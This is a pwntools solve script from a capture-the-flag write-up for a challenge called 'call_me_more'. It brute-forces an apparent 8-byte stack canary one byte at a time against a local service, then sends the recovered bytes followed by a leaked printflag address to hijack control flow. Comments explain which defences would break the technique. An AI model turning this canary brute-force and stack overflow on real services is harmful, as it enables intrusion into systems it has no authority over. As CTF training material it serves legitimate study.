write-ups-challenges-2019-2020/call_me_more/solve/solve.py

import sys

from pwn import *
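# Solve script for the "call_me_more" challenge, run against a local instance
# of the service on 127.0.0.1:2345.
#
# Stage 1 recovers 8 unknown bytes, one position at a time: every connection
# sends the known prefix plus a single candidate byte. A "Wrong!" reply is
# treated as "candidate accepted"; a connection that ends first is treated as
# "candidate rejected".
# Stage 2 sends the recovered prefix followed by the address the service
# printed in its banner, twice.
#
# NOTE(review): the 8 recovered bytes are presumably a stack canary -- confirm
# against the challenge binary; the server side is not shown here.
# Defensive reading: a byte-at-a-time search like this only converges when the
# secret is identical on every connection and the service reacts differently
# to a right and a wrong byte. Re-randomising per connection (a fresh exec
# rather than a bare fork), alerting on bursts of aborted connections, and not
# printing internal addresses in the banner each remove one of those
# preconditions.
#
# NOTE: the payload is built with Python 2 byte strings (str + chr(i));
# running under Python 3 would need the str/bytes handling ported.

context.log_level = 'error'  # silence pwntools' per-connection log output

HOST = '127.0.0.1'
PORT = 2345
BANNER = "Pointer to printflag is 0x"

offset = 32
buf = "A" * offset + "B" * 8  # fixed filler that precedes the unknown bytes

i = 0  # candidate value for the next unknown byte
g = 0  # number of unknown bytes recovered so far
while i != 0x100 and g < 8:
    r = remote(HOST, PORT)
    try:
        # The banner ends with a hex address; parse it even though stage 1
        # does not use it, so the stream is positioned after the banner.
        r.recvuntil(BANNER)
        addr = int(r.recvuntil("\n"), 16)

        exploit = buf + chr(i)
        r.send(exploit)
        try:
            r.recvuntil("Wrong!")
        except EOFError:
            # pwntools raises EOFError when the peer closes before the marker
            # arrives. Catching only that (instead of a bare except) keeps
            # Ctrl-C and genuine bugs visible.
            sys.stdout.write(". ")
            sys.stdout.flush()
            i += 1
        else:
            # Candidate accepted: keep it and restart the search for the
            # next position.
            buf = exploit
            print(str(i))
            i = 0
            g += 1
    finally:
        r.close()

if g < 8:
    # All 256 candidates were rejected for one position; continuing would
    # send a short, meaningless payload, so stop with a clear message.
    raise SystemExit("no candidate accepted for byte %d; aborting" % g)

r = remote(HOST, PORT)
try:
    r.recvuntil(BANNER)
    addr = int(r.recvuntil("\n"), 16)
    print("Pointer is %x" % addr)
    # Recovered prefix followed by the banner address, packed by p64, twice.
    exploit = buf + p64(addr) + p64(addr)
    print(exploit)
    r.send(exploit)
    print(r.recv())
finally:
    r.close()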